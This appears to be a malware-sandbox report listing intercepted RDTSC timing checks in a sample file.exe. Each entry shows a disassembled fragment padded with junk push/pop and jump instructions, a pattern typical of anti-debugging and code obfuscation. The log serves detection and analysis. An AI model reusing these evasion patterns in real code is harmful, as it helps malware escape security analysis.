Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 42877C second address: 4287B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F856102FBEEh 0x0000000d jmp 00007F856102FBF9h 0x00000012 ja 00007F856102FBE6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428D8F second address: 428D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428D93 second address: 428D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 429088 second address: 429095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 429095 second address: 4290AC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F856102FBE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jng 00007F856102FBE6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4298AA second address: 4298B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4298B2 second address: 4298B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4298B7 second address: 4298D2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F856106A863h 0x00000008 jmp 00007F856106A85Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4326D8 second address: 4326DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 431B94 second address: 431BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F856106A860h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 431E7F second address: 431E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4323B6 second address: 4323C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F856106A856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4323C0 second address: 4323D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856102FBEEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4323D4 second address: 4323DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4323DA second address: 43242A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF0h 0x00000007 jc 00007F856102FBE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F856102FBF0h 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007F856102FBEDh 0x00000020 popad 0x00000021 jmp 00007F856102FBF1h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43242A second address: 432438 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F856106A858h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43AB9D second address: 43ABA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43AE92 second address: 43AEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a jne 00007F856106A856h 0x00000010 pop edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43AEA6 second address: 43AEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F856102FBE6h 0x0000000a jnl 00007F856102FBE6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B022 second address: 43B026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B026 second address: 43B02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B02F second address: 43B037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B4BE second address: 43B4F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F856102FBE6h 0x00000009 pop edi 0x0000000a push esi 0x0000000b jmp 00007F856102FBF9h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jno 00007F856102FBE8h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B4F4 second address: 43B4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B651 second address: 43B675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF0h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F856102FBEEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B675 second address: 43B68F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F856106A865h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B815 second address: 43B81F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F856102FBE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B958 second address: 43B968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856106A85Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B968 second address: 43B991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F856102FBE6h 0x0000000a popad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop edx 0x00000010 push ebx 0x00000011 jmp 00007F856102FBF0h 0x00000016 jp 00007F856102FBECh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43C81A second address: 43C82F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43C82F second address: 43C862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F856102FBF8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F856102FBF1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43A516 second address: 43A526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F856106A856h 0x0000000a jng 00007F856106A856h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4431C0 second address: 4431D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jmp 00007F856102FBF1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 443331 second address: 443352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F856106A866h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4505A2 second address: 4505AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F856102FBE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4505AE second address: 4505B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4628C4 second address: 4628CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4628CF second address: 4628D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4628D5 second address: 4628E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371A1C second address: 371A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371A22 second address: 371A3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F856102FBE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F856102FBEBh 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371A3E second address: 371A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 je 00007F856106A874h 0x0000000c jno 00007F856106A85Eh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371A5B second address: 371A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46B35D second address: 46B372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F856106A85Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469C5C second address: 469C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469F84 second address: 469F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469F8A second address: 469F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469F8E second address: 469FA4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F856106A86Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469FA4 second address: 469FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46A689 second address: 46A693 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46A693 second address: 46A6BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F856102FBE6h 0x00000009 jnc 00007F856102FBE6h 0x0000000f pop esi 0x00000010 push esi 0x00000011 jng 00007F856102FBE6h 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jp 00007F856102FC06h 0x00000022 jnl 00007F856102FBECh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46B0E6 second address: 46B0EC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46C9D9 second address: 46C9F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46C9F8 second address: 46C9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 480979 second address: 480986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 480986 second address: 48098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48098A second address: 480993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4807F9 second address: 48081A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F856106A861h 0x0000000d jl 00007F856106A85Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 483FA6 second address: 484011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F856102FBE6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jnl 00007F856102FBF4h 0x00000015 jmp 00007F856102FBF0h 0x0000001a pushad 0x0000001b jmp 00007F856102FBF7h 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F856102FBF9h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 492997 second address: 49299B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49299B second address: 49299F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49299F second address: 4929DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F856106A870h 0x0000000c jmp 00007F856106A85Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 492584 second address: 49258A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49258A second address: 49258E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49258E second address: 492594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 492594 second address: 4925AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F856106A856h 0x0000000d push eax 0x0000000e pop eax 0x0000000f je 00007F856106A856h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB17F second address: 4AB186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB186 second address: 4AB18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB18C second address: 4AB192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB192 second address: 4AB196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB47D second address: 4AB483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB483 second address: 4AB487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB487 second address: 4AB4AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF6h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F856102FBE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB4AD second address: 4AB4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB4B1 second address: 4AB4B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB737 second address: 4AB73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4ABE14 second address: 4ABE18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AEE33 second address: 4AEE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AEE39 second address: 4AEE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F856102FBECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AEE4A second address: 4AEE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AF17E second address: 4AF182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AF182 second address: 4AF191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AF191 second address: 4AF197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1F05 second address: 4B1F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1F0B second address: 4B1F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1F0F second address: 4B1F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F856106A856h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1AA5 second address: 4B1AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1AAB second address: 4B1ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F856106A866h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B39C3 second address: 4B39C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C0306 second address: 3C030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C030D second address: 3C0313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0400 second address: 50B042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F856106A869h 0x0000000a jmp 00007F856106A85Bh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B042B second address: 50B0467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F856102FBF8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0467 second address: 50B046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B046B second address: 50B0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0471 second address: 50B0477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0477 second address: 50B047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E04B6 second address: 50E0554 instructions: 0x00000000 rdtsc 0x00000002 call 00007F856106A85Bh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F856106A864h 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007F856106A860h 0x00000019 mov ebp, esp 0x0000001b jmp 00007F856106A860h 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 mov di, si 0x00000025 mov ax, E009h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F856106A85Fh 0x00000030 xchg eax, ecx 0x00000031 jmp 00007F856106A866h 0x00000036 xchg eax, esi 0x00000037 jmp 00007F856106A860h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F856106A85Eh 0x00000044 rdtsc
